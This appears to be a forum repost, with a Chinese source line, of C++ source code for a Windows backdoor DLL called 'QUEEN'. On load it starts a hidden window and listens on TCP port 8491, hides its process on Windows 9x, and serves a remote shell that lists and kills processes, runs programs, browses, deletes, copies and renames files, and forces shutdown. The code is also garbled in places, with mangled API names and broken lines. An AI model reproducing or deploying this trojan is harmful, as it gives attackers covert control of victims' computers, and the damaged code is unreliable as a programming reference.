信息来源:特络纳
复制内容到剪贴板
代码:
#pragma hdrstop
file://-----------------------------------------------------------------
----------
#pragma argsused
#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#include <condefs.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <math.h>
file://注册服务
#define SERVICE_PROC 1
file://卸载服务
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
file://缓冲区长度
#define dwBuffSize 2048
file://命令行长度
#define dwComm 50
#define PORT 8491
#define WM_SOCKET WM_USER+1
#define PROMPT "QUEEN:\\>"
DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET createSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;
HINSTANCE DLLInst;
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);
file://-----------------------------------------------------------------
----------
// GetOS
// 判断操作系统
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
file://-----------------------------------------------------------------
----------
// HideProc
// 注册进程
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
////////////////////////////////////////////////////////////////////////
////
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL
bEnablePrivilege)//设定权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError()
);
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////
////
BOOL KillPS(DWORD id)
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken
))
{
printf("\nOpen Current Process Token
failed:%d",GetLastError());
}
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
printf("\nSetPrivilege ok!");
}
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
}
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
}
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
file://-----------------------------------------------------------------
----------
// EnumProcess
// 枚举进程
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI EnumProcess()
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
TCHAR szFileName[MAX_PATH];
hProcessSnap = createToolhelp32Snapshot(TH32CS_SNAPPROCESS,//进程列表包
含在快照集里
0);//0表示当前进程
if (hProcessSnap == (HANDLE)-1)//调用失败返回-1
{
wsprintf(szFileName,"\ncreateToolhelp32Snapshot()
failed:%d",GetLastError());
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
wsprintf(szFileName,"\nProcessName ProcessID");
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
if (Process32First(hProcessSnap, &pe32))//取得系统快照集中有关的第一个进
程的信息
{
do
{wsprintf(szFileName,"\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
while (Process32Next(hProcessSnap, &pe32));//取得记录在系统快照集中
有关的下一个进程的信息
}
else
{
file://printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
}
file://-----------------------------------------------------------------
----------
// LoadProcess
// 执行文件
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;
if(createProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==F
ALSE)
{
return FALSE;
}
return TRUE;
}
file://-----------------------------------------------------------------
----------
// Dir
// 浏览文件,支持通配符
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;
wsprintf(szFileName,"\n\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
lstrcpy(szFileName,lParam);
if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wsprintf(szFileName,"%-20s %10lu
<DIR>\n\r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s
%10luARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_HIDDEN)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu
ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
}
while(FindNextFile(hHandle,&wfd));
}
else
{
wsprintf(szFileName,"Can not find directory or files.\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}
file://-----------------------------------------------------------------
----------
// FileOpertion
// 文件操作函数
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD
opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];
lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]='\0';
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]='\0';
ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;
if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}
file://-----------------------------------------------------------------
----------
// delete
// 删除文件(隐藏,只读),目录,支持统配符
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_delete))
send(NewSock,"delete File is Fail",20,0);
else
send(NewSock,"delete File is OK",18,0);
}
file://-----------------------------------------------------------------
----------
// Copy
// 复制,上传,下载文件(需先将自己硬盘设置为完全共享),支持统配符
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",16,0);
}
file://-----------------------------------------------------------------
----------
// Ren
// 文件,目录重命名
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_rename))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}
file://-----------------------------------------------------------------
----------
// GetSysInfo
// 获取系统信息
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
wsprintf(szBuff,"\n\n\r<<System Information>>\n\n\r");
send(NewSock,szBuff,lstrlen(szBuff),0);
file://计算机名
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://当前操作系统
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://内存容量
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
wsprintf(szBuff,"Total Memroy: %dM\n\n\r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);
file://系统目录
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s\n\n\rSystem Directory:
%s\n\n\r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);
file://驱动器及分区类型
TCHAR szFileSys[10];
for(int i=0;i<26;++i)
{
wsprintf(szTemp,"%c:\\",'A'+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH)
;
wsprintf(szBuff,"Hard Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH)
;
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
file://-----------------------------------------------------------------
----------
// ExitWin
// 关闭计算机(WIN 9X,NT/2000)
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
file://LookupPrivilegevalue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
file://-----------------------------------------------------------------
----------
// ChangeDir
// 改变当前目录
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
if(SetCurrentDirectory(szDir))
return TRUE;
else
return FALSE;
}
file://-----------------------------------------------------------------
----------
// GetCurPath
// 得到当前目录
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
GetCurrentDirectory(MAX_PATH,lpBuff);
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
file://-----------------------------------------------------------------
----------
// ExeCommand
// 执行命令
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
VOID ExeCommand(LPSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
double PidArray[5],pid;
int i;
if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();
else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();
else if((lstrcmp(szCommand,"enumps"))==0)
EnumProcess();
else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();
else if((strncmp(szCommand,"killps",lstrlen("killps")))==0)
{
if(lstrlen(szCommand)<=lstrlen("killps")+2)
{
send(NewSock,"usage : killps PID",12,0);
}
for(i=lstrlen("killps")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')
break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("killps")+1);
int e=lstrlen(szCommand)-lstrlen("killps")-1;
for(int bit=0;bit<i-lstrlen("killps")-1;bit++)
{
PidArray[bit]=(DWORD)Param1[bit]-48;
pid+=PidArray[bit]*pow(10,--e);
}
if(KillPS(pid)==FALSE)
send(NewSock,"killps Fail",12,0);
else
send(NewSock,"killps OK",10,0);
}
}
else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
if(LoadProcess(Param1)==FALSE)
send(NewSock,"execfile Fail",14,0);
else
send(NewSock,"execfile OK",11,0);
}
}
else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive\\Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("cd")+1);
if(ChangeDir(Param1)==FALSE)
send(NewSock,"Change Directory Fail",21,0);
else
send(NewSock,"Change Directory OK",19,0);
}
}
else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("dir")+1);
Dir(Param1);
}
}
else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("del")+1);
delete(Param1);
}
}
else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("copy")+1);
lstrcpy(Param2,"");
send(NewSock,"Copy File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf[i]='0';
lstrcpy(Param1,szBuf+lstrlen("copy")+1);
lstrcpy(Param2,szBuf+i+1);
Copy(Param1,Param2);
}
}
else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
if(szCommand=='\0')break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("ren")+1);
lstrcpy(Param2,"");
send(NewSock,"Ren File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf[i]='0';
lstrcpy(Param1,szBuf+lstrlen("ren")+1);
lstrcpy(Param2,szBuf+i+1);
Ren(Param1,Param2);
}
}
else
send(NewSock,"Bad Command !!!",16,0);
}
file://-----------------------------------------------------------------
----------
// InitSocket
// 初始化SOCKET
file://-----------------------------------------------------------------
---------
extern "C" __declspec(dllexport)
BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
createSock=socket(AF_INET,SOCK_STREAM,0);//用来创建一个套接字,成功返回新
套接字的描述字
if(createSock==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
setsockopt(createSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFl
ag));
if(bind(createSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
}
else if(listen(createSock,3)==SOCKET_ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}
else
if(WSAAsyncselect(createSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_
ERROR)
{
closesocket(createSock);
MessageBox(hWnd,"WSAselect ERROR",NULL,MB_OK);
return FALSE;
}
addrlen=sizeof(SOCKADDR_IN);
return TRUE;
}
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM
lParam)
{
static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];
switch(message)
{
case WM_SOCKET:
if(WSAGETselectERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETselectEVENT(lParam))
{
file://连接
case FD_ACCEPT:
NewSock=accept(createSock,(LPSOCKADDR)&NewSock_in,&addrlen);
WSAAsyncselect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"QUEEN Ver 0.5beat Write by
NOIR\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
break;
file://读取输入,如是回车则执行命令
file://不是将输入复制到缓冲区
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
send(NewSock,szCommand,dwComm,0);
break;
case FD_CLOSE:
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
file://-----------------------------------------------------------------
----------
extern "C" __declspec(dllexport)
WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="QUEEN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=createWindow(szAppName,"QUEENServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
updateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);
file://复制文件到系统目录
file://并加载注册表,自动运行
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (msg.wParam);
}
file://-----------------------------------------------------------------
----------------
DWORD WINAPI start(LPVOID not)
{
HANDLE hinst=GetCurrentProcess();//或用HMODULE GetModuleHandle()
LPSTR lpCmdLine=GetCommandLine();
WinMain(hinst,//当前的实例句柄
NULL,//总为NULL
lpCmdLine,//命令行参数,由GetCommandLine()得到
SW_SHOW);//窗口显示方式
}
file://-----------------------------------------------------------------
----------------
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID
lpvReserved)
{ char *szprocessid=new char[10];
DWORD hthreadid;
HANDLE hthread;
switch(fwdreason)
{
case DLL_PROCESS_ATTACH:
hthread=createThread(NULL,0,start,(LPVOID)1,0,&hthreadid);
break;
default:
break;
}
return(TRUE);
return 1;
}
